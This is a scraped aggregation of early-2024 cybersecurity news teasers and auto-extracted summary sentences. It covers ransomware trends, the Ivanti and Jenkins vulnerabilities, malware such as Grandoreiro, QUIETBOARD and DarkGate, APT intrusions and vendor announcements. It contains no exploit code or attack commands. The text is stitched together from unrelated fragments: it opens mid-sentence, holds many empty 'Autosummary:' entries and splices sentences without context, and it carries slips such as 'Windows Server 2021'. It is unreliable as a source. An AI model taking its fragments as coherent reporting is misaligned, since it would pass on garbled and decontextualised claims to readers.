[A-F0-9]{8} sequence, e.g., "MsBA4B6B3AApp.dll") Services added for persistence (CERT-UA) If any of the above indicates PurpleFox infection, CERT-UA suggests either using Avast Free AV to run a "SMART" scan and remote all modules or perform the following steps: Boot from LiveUSB or connect the infected drive to another computer Manually delete "MsXXXXXXXXApp.dll" and ".sdb" "Autosummary:
A search for ‘IRS support’ returns the following ad claiming to be the “IRS Support Line”: The website tied to this ad is shown with the corresponding advertiser (left), while a different website from a different advertiser is seen (right).While the pitch varies, a common scam consists of selling expensive support plans, such as in this example below which is for the first advert seen earlier: AI-assisted taxes AI has been all the rage in the past year or so. "Autosummary:
The disclosure comes as Akamai revealed that the InfectedSlurs botnet is actively exploiting now-patched security flaws (from CVE-2024-22768 through CVE-2024-22772, and CVE-2024-23842) impacting multiple DVR device models from Hitron Systems to launch distributed denial-of-service (DDoS) attacks. "Autosummary:
The FTC"s complaint alleges that the company "failed to monitor attempts by hackers to breach its networks, segment data to prevent hackers from easily accessing its networks and databases, ensure data that is no longer needed is deleted, adequately implement multifactor authentication, and test, review and assess its security controls" and "allowed employees to use default, weak, or identical passwords for their accounts. "The newest version of the vulnerability scoring system CVSS 4.0 is here! After a lengthy gap between version 3 (released in 2015), as of November 2023 version 4.0 is officially live. Building iteratively on version 3 there are a few differences that in theory should improve how we score, perceive and categorize vulnerabilities. What was wrong with version 3.0? Version 3.0 and CVSS in general, while being quite good at measuring the ”impact” of a … More
The post Does CVSS 4.0 solve the exploitability problem? appeared first on Help Net Security.
"Autosummary:
This differs from attack complexity, which has more to do with the security controls that must be overcome (e.g., ASLR for buffer overflows, WAFs, etc.) for the attack to succeed. While the attack complexity parameter sadly hasn’t changed, attack requirements introduces the prerequisite deployment and execution conditions that need to be in place for the attack to succeed – for example: a specific configuration setting of a web server, presence of a specific code dependency, etc. "In this Help Net Security interview, Stephanie Hagopian, VP of Security at CDW, discusses offensive strategies in the face of complex cyberattacks and the role of the zero-trust model. The conversation also covers the essential steps for a reactive cybersecurity strategy post-attack, emphasizing transparency and preparedness. Furthermore, we examine the benefits of adopting a proactive cybersecurity approach, particularly in terms of cost efficiency and crisis management, and explore the impact of offensive security testing on … More
The post Proactive cybersecurity: A strategic approach to cost efficiency and crisis management appeared first on Help Net Security.
"Autosummary:
In turn, in the case of a cyberattack, companies can save organizations millions of dollars in preventing unplanned downtime, reputational costs and regulatory fines, among other costs. Furthermore, we examine the benefits of adopting a proactive cybersecurity approach, particularly in terms of cost efficiency and crisis management, and explore the impact of offensive security testing on compliance and zero-day response. "Ransomware attacks are increasing again as cybercriminals’ motivation shifts to data exfiltration, according to Delinea. The familiar tactics of crippling a company and holding it hostage have been replaced by new strategies that use stealth to exfiltrate private and sensitive data. Cybercriminals then frequently threaten to sell it to the highest bidder on the darknet or leverage it to reap a handsome cyber insurance payment. Ransomware on the rise Although not back at the levels … More
The post Cybercriminals replace familiar tactics to exfiltrate sensitive data appeared first on Help Net Security.
"Autosummary:
Changing tactics in ransomware attacks As their main goals changed, cybercriminals modified their tactics and moved away from using email as a preferred attack vector (down from 52% to 37%), targeting cloud (44%) and compromised applications (39%) instead. "Autosummary:
"Autosummary:
"White Phoenix is a free ransomware recovery tool for situations where files are encrypted with intermittent encryption. It was tested on BlackCat/ALPHV Ransomware, Play Ransomware, Qilin/Agenda Ransomware, BianLian Ransomware, and DarkBit. Intermittent encryption occurs when ransomware chooses not to encrypt every part of each file but instead encrypts sections, frequently in blocks of a set size or just the start of the targeted files. Consumer concerns about ransomware attacks Consumers are keeping a pulse on … More
The post Free ransomware recovery tool White Phoenix now has a web version appeared first on Help Net Security.
"Autosummary:
So, companies should ensure they have strong protective and detective measures in place, such as effective endpoint protection, robust email and web filtering for malicious content, mature security awareness programs, immutable backups, and constant monitoring for suspicious activity. "Autosummary:
Is The New "Follow The Money" As the SEC is tasked with protecting investors and maintaining "fair, orderly, and efficient markets," regulating registrants" SaaS and SaaS-to-SaaS connections falls within the agency"s purview.Applicable public companies, known as "registrants," are now subject to cyber incident disclosure and cybersecurity readiness requirements for data stored in SaaS systems, along with the 3rd and 4th party apps connected to them.With SSPM, you can monitor configurations and permissions across all SaaS apps, along with understanding the permissions and reach of SaaS-to-SaaS connections, including connected AI tools. "Autosummary:
" QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features that allow it to execute arbitrary commands, alter crypto wallet addresses copied to clipboard to redirect fund transfers to wallets under their control, propagate the malware to removable drives, take screenshots, and gather system information. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Patches for two more actively exploited zero-days The company also released patches today for two other zero-days disclosed in early January— an authentication bypass (CVE-2023-46805) and a command injection (CVE-2024-21887)—chained in widespread attacks to deploy malware on vulnerable ICS, IPS, and ZTA gateways since January 11. "VikingCloud announced THOR AI (Threat Hunting and Orchestrated Response), a generative AI-powered cybersecurity chatbot. The new complimentary cyber defense tool is designed to assist companies of all sizes find more vulnerabilities faster – before they become disruptive threats to their business. THOR AI is built on two recently filed patent-pending innovations for (1) THOR AI’s algorithms based on VikingCloud’s cybersecurity and compliance dataset, and (2) persona-based communications customization. The company currently has 28 granted patents. … More
The post VikingCloud THOR AI offers real-time interactive analytics appeared first on Help Net Security.
"Autosummary:
Proprietary models will accurately identify the level of cybersecurity expertise of individual users, from non-existent to CISO-level capabilities – making the solution highly-adoptable, easy-to-use, and effective. "Autosummary:
"Autosummary:
"These leads can be incredibly specific, tailored for any region, niche, demographic, specific company customers, and more," the researchers said. "Autosummary:
In early January 2024, software firm Ivanti reported that threat actors were exploiting other two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure to remotely execute arbitrary commands on targeted gateways. "Autosummary:
The list of targets includes multiple Fortune 500 companies operating in various industry sectors, such as: Global government and military departments National telecommunications companies Defense contractors Technology firms Banking, finance, and accounting institutions Worldwide consulting services Aerospace, aviation, and engineering entities After being publicly disclosed, multiple threat actors started exploiting these vulnerabilities to deploy XMRig cryptocurrency miners and Rust-based malware. In early January 2024, software firm Ivanti reported that threat actors were exploiting two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure to remotely execute arbitrary commands on targeted gateways. "Autosummary:
CVE-2023-45779 impacts many OEMs, including ASUS (tested on Zenfone 9), Microsoft (Surface Duo 2), Nokia (G50), Nothing (Phone 2), VIVO (X90 Pro), Lenovo (Tab M10 Plus), and Fairphone (5). "Autosummary:
"Autosummary:
"The Volt Typhoon malware enabled China to hide, among other things, pre-operational reconnaissance and network exploitation against critical infrastructure like our communications, energy, transportation, and water sectors—steps China was taking, in other words, to find and prepare to destroy or degrade the civilian critical infrastructure that keeps us safe and prosperous," said FBI Director Christopher Wray. "With more of the vehicle buying journey shifting online and vehicle prices remaining at elevated levels, fraudsters are targeting the automotive industry at an increasing rate. To address the rising threat, Experian launched Fraud Protect, a web-based application that helps automotive dealers detect and prevent fraud while maintaining a positive shopping experience for the consumer. According to a recent Experian report, nearly 70% of businesses reported that fraud losses have increased in recent years. Among … More
The post Experian Fraud Protect enables automotive dealers to detect and prevent fraud appeared first on Help Net Security.
"Autosummary:
"A zero-day vulnerability that, when triggered, could crash the Windows Event Log service on all supported (and some legacy) versions of Windows could spell trouble for enterprise defenders. Discovered by a security researcher named Florian and reported to Microsoft, the vulnerability is yet to be patched. In the meantime, the researcher has gotten the go-ahead from the company to publish a PoC exploit. The vulnerability and the PoC Florian found the bug while working on … More
The post A zero-day vulnerability (and PoC) to blind defenses relying on Windows event logs appeared first on Help Net Security.
"Autosummary:
“During the service downtime, any detection mechanisms ingesting Windows logs will be blind, allowing the attacker to take time for further attacks – password brute-forcing, exploiting remote services with unreliable exploits that often crash them, or running every attacker’s favorite whoami – without being noticed,” Kolsek pointed out.Micropatches have been provided for various releases of Windows 11, 10 and 7, and Windows Server 2022, 2019, 2016, 2021, and 2008. "Vade announced that it has pioneered a new method that improves the confidence of its spear-phishing detection engine. The enhancement, designed to combat advanced threats including those produced by generative AI, leverages threat samples created by artificial technology and human sources. The new method trains Vade’s spear-phishing algorithms on a unique combination of traditional and artificially generated spear-phishing emails. Vade has confirmed that the enhancement increases the confidence of detection across seven spear phishing classifiers, … More
The post Vade uses generative AI to enhance spear-phishing detection appeared first on Help Net Security.
"Autosummary:
In the US, W2 fraud accounts for the largest improvement, seeing a 50% increase in confidence, followed by banking fraud at 30%. "Autosummary:
"Autosummary:
QUIETBOARD is a sophisticated, multi-component backdoor used by UNC4990, offering a wide range of capabilities, including: Executing commands or scripts received from the C2 server Executing Python code received from the C2 Altering clipboard content for cryptocurrency theft Infecting USB/removable drives to spread malware on other systems Capturing screenshots for information theft Gathering detailed system and network information Determining the geographical location of the infected system QUIETBOARD also establishes persistence across system reboots and supports dynamically adding new functionalities through extra modules. "Autosummary:
"After being notified by a threat intel service that an account pretends to sell Europcar data on the dark net and thoroughly checking the data contained in the sample, we are confident that this advertisement is false: - the number of records is completely wrong & inconsistent with ours, - the sample data is likely ChatGPT-generated (addresses don"t exist, ZIP codes don"t match, first name and last name don"t match email addresses, email addresses use very unusual TLDs), - and most importantly: none of these email addresses are present in our database. "Autosummary:
Python running a malicious file The Python file it executes is heavily obfuscated: Obfuscated Python file ThreatDown will detect this malicious activity and quarantine the malicious Python file: ThreatDown detecting and blocking the malicious Python file Blocking the payload at this step is crucial as it is the point where it will otherwise contact its command and control server (C2): Network traffic between victim and C2 In recent Zip installers for Nitrogen, we noticed two files likely related to their control panel. 403WebShell Nega1ve Shell WSOX Shell Payload Nitrogen uses DLL side-loading via a signed executable to launch its payload: Side-loading a malicious DLL It then proceeds with running Python from a newly created folder under %appdata%: "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"In this Help Net Security video, Yochai Corem, CEO of Cyberint, explores the ransomware environment’s development, effects, and emerging patterns throughout the previous year. 2023 marked a historic high for ransomware groups, with a 55.5% increase in attacks, reaching 4,368 victims globally, according to Cyberint. Key findings from their report include: The MOVEit campaign was the most successful campaign of 2023, emphasizing the impact of supply chain attacks. LockBit 3.0 led as the most active … More
The post Ransomware recap 2023 highlights cybersecurity crisis appeared first on Help Net Security.
"Autosummary:
"HaystackID announced the expansion of its Protect Analytics AI Suite of AI enabled services designed to enhance the efficiency and effectiveness of identifying, analyzing, and reporting on sensitive information within large, unstructured datasets. The enhanced suite featuring Protect Analytics AI – Sensitive Data Identification, Protect Analytics AI – Entity Extraction, and Protect Analytics AI – Deploy continues to transform cybersecurity-centric incident responses, breach investigations, and notification actions by decreasing time to precision insight and action … More
The post HaystackID enhances Protect Analytics AI Suite to strengthen data analysis appeared first on Help Net Security.
"Autosummary:
Key cross-functional features of the Protect Analytics AI Suite, enabled through a combination of custom development and multimodal integration of best-of-breed AI and large language model (LLM) tools, include: Interactive visualizations : Through integration with tools like Microsoft Power BI, the suite provides interactive data visualizations, enabling users to sort, query, and analyze sensitive data swiftly and effectively. "Qualys announced that it is expanding its partnership with Orange Cyberdefense. This expansion signifies that Qualys’ capabilities such as Vulnerability Management, Detection and Response (VMDR) will be included in Orange Cyberdefense’s managed Vulnerability Intelligence Service. The expanded collaboration will give global businesses the ability to leverage Orange Cyberdefense’s managed service to optimize vulnerability management activities and reduce cyber risk thus enabling customers to focus on their core business. “Expanding our partnership with Qualys felt natural,” … More
The post Qualys expands partnership with Orange Cyberdefense to optimize vulnerability management activities appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The company is working to restore the impacted systems and is investigating the incident with the help of leading cybersecurity firms, The Cactus ransomware operation has been active since March 2023, despite the threat actors use a double-extortion model, their data leak site has yet to be discovered. "Autosummary:
"Autosummary:
DarkGate"s developer said it includes many capabilities, such as a concealed VNC, tools to bypass Windows Defender, a browser history theft tool, an integrated reverse proxy, a file manager, and a Discord token stealer. "Autosummary:
According to the framework, SMBs can mitigate risks by: Controlling who can access your network and data Having formal policies for use Encrypting sensitive data, both at rest and in transit Using network firewalls with integrated security Monitoring for unauthorized access Backing up data regularly Creating plans for responding and recovering from attacks These best practices can help reduce unauthorized access. In 2023, we’ve seen multiple breaches of SMBs that turned into large-scale attacks on major companies, including AT&T, Chic-fil-A, and 1Password. End-user awareness training 88% of data breaches can be traced back to human error, according to a joint study between a Stanford University researcher and Tessian. "Autosummary:
Two years ago, James also led a coalition of attorneys general from multiple U.S. states urging major banks—including JPMorgan Chase, Bank of America, U.S. Bank, and Wells Fargo—to eliminate overdraft fees on consumer accounts. "Autosummary:
Most of the victims are in Spain, Mexico, and Brazil, while the most impacted operating system is Windows 10, followed by 7, 8, and 11. "Autosummary:
Grandoreiro is one of the many Latin American banking trojans such as Javali, Melcoz, Casabeniero, Mekotio, and Vadokrist, primarily targeting countries like Spain, Mexico, Brazil, and Argentina. "Autosummary:
"Autosummary:
"Autosummary:
Current ransomware strains employing intermittent encryption include Blackcat/ALPHV, Play, Qilin/Agenda, BianLian, and DarkBit. "Autosummary:
Root access vulnerability in GNU Library C (glibc) impacts many Linux distros Pierluigi Paganini January 30, 2024 January 30, 2024 Qualys researchers discovered a root access flaw, tracked as CVE-2023-6246, in GNU Library C (glibc) affecting multiple Linux distributions. "Autosummary:
Grandoreiro DGA clusters Cluster ID dga_id list Cluster size % of all C&C servers % of all victims 1 b, bbh, bbj, bbn, bhg, cfb, cm, cob, cwe, dee, dnv, dvg, dzr, E, eeo, eri, ess, fhg, fox, gh, gh(2), hjo, ika, jam, jjk, jjk(2), JKM, jpy, k, kcy, kWn, md7, md9, MRx, mtb, n, Nkk, nsw, nuu, occ, p, PCV, pif, rfg, rox3, s, sdd, sdg, sop, tkk, twr, tyj, u, ur4, vfg, vgy, vki, wtt, ykl, Z, zaf, zhf 62 93.6% 94% 2 jl2, jly 2 2.4% 2.5% 3 ibr 1 0.8% 1.6% 4 JYY 1 1.6% 1.1% The biggest cluster contains 78% of all active dga_ids. Grandoreiro long-term tracking ESET systems designed for automated, long-term tracking of selected malware families have been monitoring Grandoreiro since the end of 2017, extracting version information, C&C servers, targets and, since the end of 2020, DGA configurations.The malware allows: blocking the screen of the victim, logging keystrokes, simulating mouse and keyboard activity, sharing the victim’s screen, and displaying fake pop-up windows.Interestingly, we have seen a few (fewer than 10) victims marked as PM (Saint Pierre and Miquelon), GR (Greece), or FR (France).However, this number certainly contains duplicates, because if a victim stays connected for a long time, which we’ve observed is often the case, then the Grandoreiro C&C server will report it on multiple requests.Statistical information about Grandoreiro C&C IP addresses since we started our tracking Information Average Minimum Maximum Number of new C&C IP addresses per day 3 1 34 Number of active C&C IP addresses per day 13 1 27 Lifespan of C&C IP address (in days) 5 1 425 Very soon after we began to track the generated domains and their associated IP addresses, we started to notice that many domains generated by DGAs with different configurations resolve to the same IP address (as illustrated in Figure 3). Trying to address this issue, we defined a unique victim as one with a unique set of identifying characteristics (like computer name, username, etc.)We saw it, in small campaigns, in March, May, and June 2022.Table 2 shows both of them, “jjk” and “gh”, where “jjk” and “jjk(2)” correspond to two different DGA configurations, same as “gh” and “gh(2)”.Based on the vast majority of its C&C server domains not resolving, its core features changing quite often, and its network protocol not functioning properly, we strongly believe it is a work in progress; hence we will focus on the main variant in this blogpost.In the month-long gap between May 24th, 2022 and June 22nd, 2022 we continued to see new samples with progressing PE compilation times, but they lacked the version identifier. Operating system distribution Since all of the login_string formats contain OS information, we can paint an accurate picture of what operating systems fell victim, as illustrated in Figure 4.That said, the data is biased by the number of requests, their intervals, and the validity of the data provided by the C&C servers.To connect to Gateway, three parameters are required: a secret key, the key length, and a login. Grandoreiro internals Let us focus, in depth, on the two most crucial features of Grandoreiro: the DGA and the network protocol. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
As a result, executives across industries must recognize security as an organizational enabler, not a narrow niche for technical specialists, and build it into the fabric of their operations. In 2024, business leaders can expect to a significant increase in activity from a third flavor of adversary: ideologically motivated threat actors, often referred to as “hacktivists” or “cyberterrorists” depending on one’s opinion of their targets.For companies with 1,000-5,000 employees, the average cost of a data breach reached $4.87 million in 2023 – a year-over-year increase of nearly 20%, according to IBM.Once they have established a foothold, they may employ keyloggers to capture your every keystroke, steal browser cookies to access your online accounts, or even target specific applications like email clients and instant messaging platforms. For guidance to boost employee awareness, pg. 5 of the 2024 SME security plan checklist identifies the key components of a holistic security training program. "In this Help Net Security interview, Alon Gal, CTO at Hudson Rock, discusses integrating cybercrime intelligence into existing security infrastructures. Our discussion will cover a range of essential aspects, from the importance of continuous adaptation in cybersecurity strategies to practical advice for CISOs on enhancing threat detection and response capabilities. We’ll also explore the challenges of balancing intelligence gathering with privacy and legal considerations and look at strategies for prioritizing intelligence inputs in decision-making. What … More
The post Prioritizing cybercrime intelligence for effective decision-making in cybersecurity appeared first on Help Net Security.
"Autosummary:
To have a balance between gathering cybercrime intelligence and respecting privacy and adhering to legal considerations, organizations need to follow strict legal compliance, including data protection laws. This poses a significant risk to organizations, and it is crucial to monitor whether the organization has infected the computers of employees, customers, and partners. "2024 is shaping up to be a record-breaking year for data breaches, according to Experian. Despite 2023 being labeled as a ‘successful’ year for malicious actors, the upcoming months may bring forth developments that could further disrupt the cybersecurity landscape. Supply chain vulnerabilities amplified There’s no question third-party data breaches have made headlines. With increased data collection, storage, and movement, there are plenty of partners down the supply chain that could be targeted. We predict … More
The post Cybercriminals embrace smarter strategies, less effort appeared first on Help Net Security.
"Autosummary:
“Cybercriminals are continually working smarter, not harder,” said Michael Bruemmer, VP, Global Data Breach Resolution at Experian. "Autosummary:
It"s also designed to capture data from web browsers, cryptocurrency wallets, and apps like WinSCP, CoreFTP, Windscribe, Filezilla, AzireVPN, Snowflake, Steam, Discord, Signal, and Telegram. "Autosummary:
"Several proof-of-concept (PoC) exploits for a recently patched critical vulnerability (CVE-2024-23897) in Jenkins have been made public and there’s evidence of exploitation in the wild. About CVE-2024-23897 Jenkins is a widely used Java-based open-source automation server that helps developers build, test and deploy applications, enabling continuous integration (CI) and continuous delivery (CD). CVE-2024-23897 is an arbitrary file read vulnerability in Jenkins’ built-in command line interface (CLI) that could allow an unauthenticated threat actor with Overall/Read … More
The post Critical Jenkins RCE flaw exploited in the wild. Patch now! (CVE-2024-23897) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The development comes as new ransomware families such as Albabat (aka White Bat), Kasseika, Kuiper, Mimus, and NONAME have gained traction, with the former a Rust-based malware that"s distributed in the form of fraudulent software such as a fake Windows 10 digital activation tool and a cheat program for the Counter-Strike 2 game. "Autosummary:
"Autosummary:
"The FBI is warning the public about scammers instructing victims, many of whom are senior citizens, to liquidate their assets into cash and/or buy gold, silver, or other precious metals to protect their funds," the FBI said. "Autosummary:
Ransom payment rates Source: Coveware According to Coveware, the reason for this continual drop is multifaceted, including better preparedness by organizations, a lack of trust towards cybercriminals promising not to publish stolen data, and legal pressure in some regions where paying a ransom is illegal. "Autosummary:
Vladimir Dunaev, from Amur Oblast in the far east of Russia, was a key member of the Trickbot cybercrime gang, infamous for its sophisticated data-stealing Trojan that defrauded innocent internet users in the United States, UK, Australia, Canada, Germany, India, Italy, and elsewhere. "Autosummary:
"Autosummary:
Most of the vulnerable internet-exposed instances are in China (12,000) and the United States (11,830), followed by Germany (3,060), India (2,681), France (1,431), and the UK (1,029). "Autosummary:
Outage message on Schneider Electric"s Resource Advisor platform Source: BleepingComputer Customers of Schneider Electric"s Sustainability Business division include Allegiant Travel Company, Clorox, DHL, DuPont, Hilton, Lexmark, PepsiCo, and Walmart. Like all ransomware operations, the threat actors will breach corporate networks through purchased credentials, partnerships with malware distributors, phishing attacks, or by exploiting vulnerabilities. "Autosummary:
Evaluating, reviewing, and advising on best practice, drawing on external expertise, including the National Cyber Security Centre (NCSC). "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
On January 24, 2024, Jenkins released fixes for the two flaws with versions 2.442 and LTS 2.426.3, and published an advisory that shares various attack scenarios and exploitation pathways, as well as fix descriptions and possible workarounds for those unable to apply the security updates. "Autosummary:
Medusa ransomware attack hit Kansas City Area Transportation Authority Pierluigi Paganini January 28, 2024 January 28, 2024 Medusa ransomware gang claimed responsibility for the attack against the Kansas City Area Transportation Authority (KCATA). "Autosummary:
Multiple PoC exploits released for Jenkins flaw CVE-2024-23897 Pierluigi Paganini January 28, 2024 January 28, 2024 Multiple proof-of-concept (PoC) exploits for recently disclosed critical Jenkins vulnerability CVE-2024-23897 have been released. "Autosummary:
"Autosummary:
"AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim"s machine," BlackBerry said. "Autosummary:
Participants earned more than $1.3M at the Pwn2Own Automotive competition Pierluigi Paganini January 27, 2024 January 27, 2024 Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @LawrenceAbrams, @serghei, @BleepinComputer, @Seifreed, @Ionut_Ilascu, @demonslay335, @fwosar, @malwrhunterteam, @NCSC, @TrendMicro, @Intrinsec, @Fortinet, @pcrisk, and @rivitna2. Unfortunately, we also learned about numerous large-scale attacks this week, including an Akira attack on Tietoevry, an attack on water services giant Veolia North America, and an attack on fintech firm Equilend, which LockBit claimed. "Autosummary:
"All service is operating, including fixed-route buses, Freedom and Freedom-On-Demand paratransit service," explained KCATA. "Autosummary:
Pro-Ukraine hackers wiped 2 petabytes of data from Russian research center Pierluigi Paganini January 27, 2024 January 27, 2024 The Main Intelligence Directorate of Ukraine’s Ministry of Defense states that pro-Ukraine hackers wiped 2 petabytes of data from a Russian research center. "Autosummary:
"All service is operating, including fixed-route buses, Freedom and Freedom-On-Demand paratransit service," explained KCATA. "In this Help Net Security interview, Amber Schroader, CEO at Paraben Corporation, discusses the challenges posed by the complexity of modern computer systems and networks on digital evidence collection. Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields. How has the complexity of modern … More
The post Emerging trends and strategies in digital forensics appeared first on Help Net Security.
"Autosummary:
Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields.The cross-sharing of app data and just data, in general, has been streamlined, and our investigative scope is changing as well. "Autosummary:
Cybersecurity firm Intel 471 said Ermakov went by various online aliases such as blade_runner, GustaveDore, JimJones, aiiis_ermak, GistaveDore, gustavedore, GustaveDore, Gustave7Dore, ProgerCC, SHTAZI, and shtaziIT. "There’s a good reason why ransomware gangs started exfiltrating victims’ data instead of just encrypting it: those organizations pay more. University of Twente researcher Tom Meurs and his colleagues wanted to know which factors influence victims to pay the ransom or not, and which factors have an effect on the ransom amount organizations end up paying. Based on the data provided by the Dutch National Police and a Dutch incident response organisation on 481 ransomware … More
The post What makes ransomware victims less likely to pay up? appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Pwn2Own Automotive 2024 Day 2 – Tesla hacked again Pierluigi Paganini January 26, 2024 January 26, 2024 Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of Pwn2Own Automotive 2024 hacking competition. "Autosummary:
"Autosummary:
"Autosummary:
The Midnight Blizzard group (aka APT29, SVR group, Cozy Bear, Nobelium, BlueBravo, and The Dukes) along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections. "Autosummary:
"Among the destroyed data are meteorological and satellite data, which were actively used in constant mode by the Ministry of Defense and MNS RF, "Roscosmos," and several other state agencies-aggressors, as well as years of unique research," reads the announcement (machine translated). "Autosummary:
Wazuh plays a significant role in implementing a cyber security architecture, providing a platform for security information and event management, active response, compliance monitoring, and more. Leveraging open source solutions and tools to build a cybersecurity architecture offers organizations several benefits, such as cost-effectiveness, flexibility, community support, and transparency. "Autosummary:
A TrickBot malware developer sentenced to 64 months in prison Pierluigi Paganini January 26, 2024 January 26, 2024 The Russian national malware developer Vladimir Dunaev was sentenced to more than 5 years in prison for his role in the TrickBot operation. "Autosummary:
The company addressed the vulnerability with the release of versions 8.5.4 (LTS), 8.6.0 (Data Center only), and 8.7.1 (Data Center only). "Autosummary:
"Autosummary:
"Autosummary:
On January 22, 2024, software company Fortra warned customers about a new authentication bypass vulnerability impacting GoAnywhere MFT (Managed File Transfer) that allows an attacker to create a new admin user. "Cozy Bear (aka Midnight Blizzard, aka APT29) has been busy hacking and spying on big tech companies: both Microsoft and Hewlett Packard Enterprise (HPE) have recently disclosed successful attack campaigns by the Russia-affiliated APT group. The Microsoft breach Last Friday, Microsoft revealed that a threat-actor identified as Midnight Blizzard – a hacking group believed to be associated with the Russian Foreign Intelligence Service (SVR) – has breached their corporate systems on January 12, 2024. The … More
The post Russian hackers breached Microsoft, HPE corporate maliboxes appeared first on Help Net Security.
"Autosummary:
"ESET researchers have discovered NSPX30, a sophisticated implant used by a new China-aligned APT group, which they dubbed Blackwood. Blackwood has carried out cyberespionage operations against individuals and companies from China, Japan, and the United Kingdom. It leverages adversary-in-the-middle techniques to hijack update requests from legitimate software to deliver the implant. ESET mapped the evolution of NSPX30 back to an earlier ancestor – a simple backdoor they have named Project Wood. The oldest sample found … More
The post Blackwood APT delivers malware by hijacking legitimate software update requests appeared first on Help Net Security.
"Autosummary:
“However, based on our own experience with China-aligned threat actors who exhibit these capabilities, as well as recent research on router implants attributed to another China-aligned group, MustangPanda, we speculate that the attackers are deploying a network implant within the networks of the victims, possibly on vulnerable network appliances, such as routers or gateways,” explains Muñoz. "All types of cyber threat actor are already using artificial intelligence (AI) to varying degrees, UK National Cyber Security Centre’s analysts say, and predict that AI “will almost certainly increase the volume and heighten the impact of cyberattacks over the next two years.” AI lowers the barrier for less skilled hackers, making it easier for them to gather information and pull off successful compromise of devices and accounts, they also noted. “This enhanced access will … More
The post AI expected to increase volume, impact of cyberattacks appeared first on Help Net Security.
"Autosummary:
AI is upskilling less-skilled hackers Although AI is used by all types of cyber threat actors, it will particularly benefit less-skilled ones, as it will enhance their ability to carry out social engineering attacks and create convincing phishing emails. "Autosummary:
"Autosummary:
The backdoor is the work of a Chinese nation-state actor known as Stone Panda (aka APT10, Bronze Riverside, Cicada, Earth Tengshe, MirrorFace, and Potassium), which has a history of orchestrating attacks targeting Japan since 2021. "Autosummary:
"Autosummary:
The NCSC expects that by 2025, GenAI and large language models (LLMs) will make it difficult for everyone, regardless of their cybersecurity posture, to assess whether an email or password reset request is genuine, or to identify phishing, spoofing, or other social engineering attempts.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Generative AI (GenAI) can already be used to create and entertain a convincing interaction with victims, including the creation of lure documents, without the translation, spelling, and grammatical errors that used to reveal phishing. "Autosummary:
"Autosummary:
Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC. "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. "Autosummary:
Ancestry reports and matching DNA segments (specifically where on your chromosomes you and your relative had matching DNA), Self-reported location (city/zip code), Ancestor birth locations and family names, Profile picture, birth year, and anything else included in their profile"s "Introduce yourself" section 23andMe told BleepingComputer in December that the hackers downloaded the data of 6.9 million people of the existing 14 million customers after breaching around 14,000 user accounts. "Autosummary:
Evolutionary timeline (ESET) Unlike its predecessors, NSPX30 is characterized by its multistage architecture, which includes components like a dropper, a DLL installer with extensive UAC bypassing capabilities, a loader, an orchestrator, and a backdoor, each with its own set of plugins. "Autosummary:
The TrickBot malware he helped develop enabled cybercriminals to collect infected victims" sensitive information (such as login credentials, credit card information, emails, passwords, social security numbers, and addresses) and siphon off funds from victims" bank accounts Dunaev is the second TrickBot malware dev prosecuted by the U.S. Department of Justice after Latvian national Alla Witte (aka Max) was apprehended in February 2021 and charged with helping develop the module designed to deploy ransomware on compromised networks. "Autosummary:
ThreatDown Endpoint Protection (EP) achieved the highest possible score (100%) and received certifications for Level 1, Exploit, Online Banking, and Ransomware in the most recent anti-malware efficacy assessment results for the Q3 2023 evaluation performed by MRG Effitas, a world leader in independent IT research. MRG Effitas assesses a product’s ability to meet today’s most pressing threats in-the-wild, such as stopping zero-day malware, ransomware, and exploits—and doing so with speedy performance and low false positives. "Autosummary:
"Autosummary:
Whatever the specific supply chain risk type, the end result could be the same: financial and reputational damage and the risk of law suits, operational outages, lost sales and angry customers.As such, it serves as a foundational document outlining expectations, standards, and procedures that suppliers must adhere to in order to ensure the security of the overall supply chain.They may impact traditional suppliers such as professional services firms (e.g., lawyers, accountants), or vendors of business software. In the US last year, there were 40% more supply chain attacks than malware-based attacks, according to one report.In a more recent case, popular file transfer software MOVEit was compromised by a zero-day vulnerability and data stolen from hundreds of corporate users, impacting millions of their customers. "In this Help Net Security interview, Randy Marchany, CISO at Virginia Tech, discusses the challenges and strategies associated with implementing CIS Controls in organizations of varying sizes. Marchany explores the importance of securing top-level management support, breaking down data silos, and setting realistic timelines for project completion. The discussion also highlights the prioritization of key controls for inventory management, the use of metrics to measure implementation effectiveness and the adaptation of CIS Controls for different … More
The post Prioritizing CIS Controls for effective cybersecurity across organizations appeared first on Help Net Security.
"Autosummary:
